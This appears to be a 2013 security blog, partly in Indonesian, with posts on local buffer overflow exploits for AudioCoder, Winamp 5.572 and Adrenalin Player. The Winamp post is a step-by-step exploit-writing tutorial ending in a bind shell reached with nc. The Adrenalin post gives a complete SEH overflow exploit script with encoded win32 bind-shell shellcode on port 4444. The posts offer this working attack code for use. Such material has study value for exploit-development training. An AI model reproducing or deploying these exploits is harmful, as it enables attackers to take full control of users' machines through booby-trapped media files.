Monday, June 24, 2013

AudioCoder 0.8.22 - Direct Retn Buffer Overflow [.m3u / .lst]

AudioCoder (formally MediaCoder Audio Edition) is a high performance and high quality batch audio transcoder based on MediaCoder. It can decode from and re-encode into most popular audio formats with up to 8 simultaneous tasks, which significantly improves transcoding speed and thus shortern the time needed to have your audio albums processed. A rich set of codec parameters are available for tuning.
And there's the local exploit :D

and the result 

exploitdb : exploit (.m3u) and exploit (.lst)
application : AudioCoder

Thursday, June 20, 2013

Exploit Winamp 5.572 Buffer Overflow [step by step]



Winamp adalah salah satu pemutar musik yang cukup terkenal. Disamping cara penggunaanya yang cukup mudah, winamp juga memiliki banyak menu, seperti pemutar radio online,online service dan lain-lain. Kali ini saya akan mencoba menulis langkah demi langkah pembuatan exploit winamp.

Winamp yang akan dipakai adalah winamp versi 5.572, dan OS yang digunakan adalah windows sp 3, dan Immunity debuger. winamp versi ini terkena buffer overflow pada menu about historynya.

Kali ini fuzzer yang digunakan dengan panjang karakter “A” sebanyak 700 karakter. Ini fuzzer sederhana yang akan kita pakai.

# !/usr/bin/python
header="Winamp 5.572 "
junk= "\x41" * 700
file = open("whatsnew.txt","w")
file.write(header+junk)
file.close()

fuzzer tersebut akan membuat file dengan nama whatsnew dengan extensi txt, sedangkan isi dari file txt tersebut adalah karakter “A” sebanyak 700 karakter. File hasil dari script di atas harus dipindah ke dalam folder “c:\Program Files\Winamp”.

setelah itu jalankan winamp yang sudah di attach pada debuger. Kemudian buka menu “help” yang terdapat pada tab menu bagian atas, lalu pilih “About Winamp” dan pilih tab “Version History”. Maka pada jendela registers akan muncul sejumlah karakter “A” yang mengisi register “ESP” dan “EBP”, dan register EIP yang terisi karakter “41414141” yang bila di ubah kedalam ASCII adalah karakter “A”.


Apabila register EIP pada sebuah aplikasi berhasil tertumpuk oleh data, maka hal seperti ini akan sangat berbahaya bagi sistem operasi yang ada, karena EIP digunakan oleh sistem operasi untuk mengeksekusi perintah apa yang selanjutnya akan dijalankan. Didalam EIP akan tersimpan alamat memori yang akan di eksekusi, maka proses selanjutnya adalah mencari tahu pada byte ke berapa EIP tertumpuk oleh data yang dikirimkan oleh fuzzer tadi.

Tahap selanjutnya adalah mencari tahu pada byte keberapa EIP tertumpuk. Jika sudah diketahui pada byte keberapa, maka byte tersebut akan diisi nilai sebesar 32bit yang akan berisi alamat dari PAYLOAD (program jahat). Untuk mencari tahu byte keberapa EIP tertumpuk, maka diperlukan bantuan tools, yaitu “pattern_create” dan “pattern_offset”

“Pattern_create” berfungsi membuat sebuah data sampah yang telah terstruktur. “pattern_create” dapat kita temukan pada folder “/opt/metasploit/apps/pro/msf3/tools” pada backtrack. Gambar diberikut adalah hasil dari penggunaan pattern_create dengan pola terstruktur sebanyak 700byte.


Terlihat kumpulan string yang mempunyai pola sebanyak 700 karakter yang dimulai dari “Aa0A” hingga karakter “x1Ax2A”. Setelah string yang mempunyai pola tersebut berhasil dibuat, maka untuk tahap berikutnya adalah memasukan string tersebut kedalam fuzzer yang tadi kita buat untuk menggantikan data karakter “A” pada fuzzer.
Setelah mengganti nilai yang ada pada variable junk menjadi kumpulan karakter yang mempunyai pola, kemudian mencoba sekali lagi fuzzer pada aplikasi winamp,ulangi seperti percobaan pertama. Bisa dilihat bahwa nilai yang ada pada register berbeda dengan sebelumnya. Saat ini nilai register yang ada pada memori aplikasi berisi dengan string yang mempunyai pola terstruktur.
Perhatikan register pada EIP dan ESP, keduanya merupakan register yang sangat vital jika dapat dikontrol. EIP merupakan alamat dimana data stack disimpan didalam memori,hal ini sangat vital jika dapat dikontrol, karena ketika seorang penyerang mengetahui dimana letak alamat stack,memungkinkan untuk penyerang menyisipi dengan program jahat kedalam stack. Sedangkan register EIP adalah tempat penyimpanan alamat yang akan dieksekusi.

Setelah itu tahap selanjutnya adalah mencari pada byte keberapa string berpola tersebut menimpa register. Untuk itu, bisa digunakan pattern_offset. Cara menjalankan aplikasi ini cukup memasukan nilai yang terdapat pada register ESP dan EIP. Pattern_offset akan menghitung berapa byte data.
Perhatikan bahwa untuk mencapai register EIP dibutuhkan data sebesar 540 byte dan untuk mencapai stack dibutuhkan 560 byte. Ini berarti register EIP akan ter overwrite 4 byte,yaitu pada byte ke 541, 542, 543, 544. Untuk membuktikannya, maka fuzzer yang dibuat akan dimodifikasi lagi seperti ini
Dengan fuzzer tersebut dan dengan hasil perhitungan dari pattern_offset, maka nilai pada register EIP akan menjadi DEADBEEF, karena sistem menggunakan penulisan dengan format little-endian, maka harus ditulis “\xEF\xBE\xAD\xDA”
Ternyata setelah winamp meng-eksekusi file whatsnew.txt, tampilan yang muncul para register EIP adalah “DEADBEEF, Selanjutnya adalah mencoba melakukan penulisan pada ESP. Seperti yang dijelaskan tadi, ESP adalah tempat untuk menyimpan data sementara didalam stack (memory).
Pada script tersebut, \x90 adalah NOPSLED (NOP) atau No Operation ( data sampah yang tidak akan di-eksekusi oleh sistem). Memory yang terisi 540 byte data sampah, kemudian 4 byte selanjutnya adalah DEADBEEF yang akan menimpa register EIP. Setelah itu fuzzer akan mengirimkan data NOP lagi dari 560byte dikurangi (4 byte dari deadbeef + 540 byte dari x90). Maka nilai ini akan menimpa nilai yang ada di register ESP.

Nilai dari ESP akan dilewati oleh sistem, karena nilai dari ESP adalah data sampah yang tidak akan di-eksekusi. Setelah itu fuzzer akan mengirimkan data sisa dari 700 dikurangi 560.

Terlihat bahwa fuzzer mengirimkan 4 byte data yang berisikan DEADBEEF, kemudian diteruskan 4 byte data NOP, dan sisa selanjutnya adalah stack yang berisi data sampah berupa karakter xCC. Kemudian untuk tahap selanjutnya, adalah mencari alamat untuk digunakan sebagai “batu loncat”, hal ini dibutuhkan karena register EIP tidak bisa mengeksekusi langsung alamat stack.

Batu loncatan tersebut adalah perintah adalam asembly yaitu JMP ESP. JMP adalah perintah dimana perintah tersebut akan memindahkan perintah dari satu register ke register yang lain. Untuk mencari perintah tersebut adalah melalui module yang digunakan oleh aplikasi winamp.

Tahap-tahap untuk mencarinya adalah pilih menu view → executable modules (Alt+E) pada menu tab. Setelah itu akan muncul window baru yang berisikan library yang dipakai oleh aplikasi. Dalam kasus ini, library yang digunakan adalah library user32.dll. Cara mencarinya adalah double klik library user32.dll.

Maka akan muncul window dari library tersebut. Kemudian klik kanan pada window tersebut, pilih search for → Command, akan ada window baru, maka isikan JMP ESP.
Alamat dari JMP ESP adalah 7E429353. Pada saat memilih JMP ESP sebaiknya alamat yang akan digunakan tidak boleh yang mengandung nilai \x00, \x0a dan \x0d . Nilai tersebut tidak boleh digunakan karena akan merusak PAYLOAD yang akan dikirim. Payload adalah muatan yang dibawa oleh data yang berisi shellcode, sedangkan shellcode merupakan sebuah kode aplikasi yang biasanya digunakan untuk mengexploitasi sebuah sistem yang mempunyai bugs.

Setelah itu tools yang digunakan adalah msfweb dari metasploit. Pada Backtrack 5 r3, Letaknya ada pada folder /pentest/exploits/framwork2..

Tools ini merupakan web interface,sehingga diperlukan browser untuk membukanya. Kemudian pilih menu PAYLOAD dan isi filter dengan win32.

Kemudian pilih Bind shell, maka akan muncul tampilan baru, kemudian isikan seperti gambar dibawah ini


Setelah itu klik generate payload, maka keluar payload yang akan digunakan. Payload tersebut akan membuka port untuk melakukan koneksi keluar sistem.

Kemudian Payload tersebut dimasukan kedalam fuzzer menjadi seperti gambar ini :

setelah itu jalankan aplikasi winamp tanpa debugger, dan buka menu about. Maka aplikasi tersebut akan crash atau not responding. Selanjutnya jalankan perintah nc 192.168.56.100 4444. Maka perhatikan gambar dibawah ini,

Payload sudah tereksekusi dengan sukses, dan secara keseluruhan sistem windows tersebut telah dikuasai.

Monday, June 17, 2013

Adrenalin Player 2.2.5.3 (.wax) - SEH Buffer Overflow



Adrenalin player is one of the music player application which has a user interface like winamp. Adrenalin player support many file format, like mp3, mp4, asf, m3u, pls, wax, etc. Yesterday I tried to make an exploit this application. 
This is the fuzzer :


# !/usr/bin/python
# Title:            Adrenalin Player (SEH) Buffer Overflow
# software:         Adrenalin Player
# version :         2.2.5.3
# Platform:         Windows XP sp3
# Date:             June 16th, 2013
# Author:           onying (@onyiing)
# Blog :        http://itsecuritynewbie.blogspot.com/
# Thanks to:        Information Security Shinobi Camp | http://www.is2c-dojo.com
junk= "\x90" * 2140
junk+="\xeb\x06\x90\x90" #jmp short
junk+="\x13\xf3\x16\x10" #POP POP RETN
junk+="\x90" * 16 # NOP padding before shellcode
#win32_bind - EXITFUNC=process LPORT=4444 Size=344 Encoder=ShikataGaNa
junk+=("\xbb\x25\xaa\xd2\xa3\x2b\xc9\xda\xd6\xd9\x74\x24\xf4\x5e\xb1\x51"
"\x31\x5e\x10\x83\xee\xfc\x03\x7b\xa6\x30\x56\x7f\xdc\x5f\xd4\x97"
"\xd8\x5f\x18\x98\x7b\x2b\x8b\x42\x58\xa0\x11\xb6\x2b\xca\x9c\xbe"
"\x2a\xdc\x14\x71\x35\xa9\x74\xad\x44\x46\xc3\x26\x72\x13\xd5\xd6"
"\x4a\xe3\x4f\x8a\x29\x23\x1b\xd5\xf0\x6e\xe9\xd8\x30\x85\x06\xe1"
"\xe0\x7e\xcf\x60\xec\xf4\x50\xae\xef\xe1\x09\x25\xe3\xbe\x5e\x66"
"\xe0\x41\x8a\x9b\x34\xc9\xc5\xf7\x60\xd1\xb4\xc4\x58\x32\x52\x41"
"\xd9\xf4\x10\x15\xd2\x7f\x56\x89\x47\xf4\xd7\xb9\xc9\x63\x56\xf7"
"\xfb\x9f\x36\xf8\xd2\x06\xe4\x60\xb3\xf5\x38\x04\x34\x89\x0e\x8b"
"\xee\x92\xbf\x5b\xc4\x80\xbc\xa0\x8a\xa5\xeb\x89\xa3\xbf\x72\xb4"
"\x59\x37\x79\xe3\xcb\x4a\x82\xdb\x64\x92\x75\x2e\xd9\x73\x79\x06"
"\x71\x2f\xd6\xf5\x25\x8c\x8b\xba\x9a\xed\xfc\x5a\x75\x03\xa1\xc4"
"\xd6\xaa\xb8\x9d\xb1\x08\x20\xed\x86\x06\xaa\xdb\x63\xb9\x05\xb6"
"\x8c\x69\xcd\x9c\xde\xa4\xe7\x8b\xdf\x6f\xa4\x66\xdf\x40\x23\x6d"
"\x56\xe7\xfd\x3a\x96\x31\xad\x90\x3c\xeb\xb1\xc8\x2e\x7b\xa9\x91"
"\x96\x05\x62\x9e\xc1\xa3\x73\xb0\x88\x21\xe8\x56\x3d\xd5\x9d\x1f"
"\x58\x73\x0e\x46\x8a\x48\x27\x9f\xa6\x14\xb1\xbd\x06\x55\x32\xeb"
"\x97\x17\x98\x15\x25\xb4\x71\x64\xd0\xfc\xde\xdd\x8e\x95\x52\xdf"
"\x62\x73\x6c\x6a\xc1\x83\x44\xcf\x9e\x29\x38\xbe\x71\xa4\xbb\x11"
"\x23\x6d\xed\x6e\x13\xe5\xa0\x49\x91\x38\xe9\x96\x4c\xae\xf1\x97"
"\x46\xd0\xde\xec\xfe\xd2\x5c\x36\x64\xd4\xb5\xe4\x9a\xfa\x52\x76"
"\xbd\x19\xd1\xd5\xc2\x08\xe9\x09")
junk+= "\x90" * (3000-len(junk))
file = open("adrenalin.wax","w")
file.write(junk)
file.close()


 This fuzzer will make file adrenalin with wax file extention. When the application exploited, just connect  with nc (IP target) 4444 (example : #nc 192.168.56.101 4444) 


file download : adrenalin player 
exploit-db :  fuzzer 
1337day.com : 1337day.com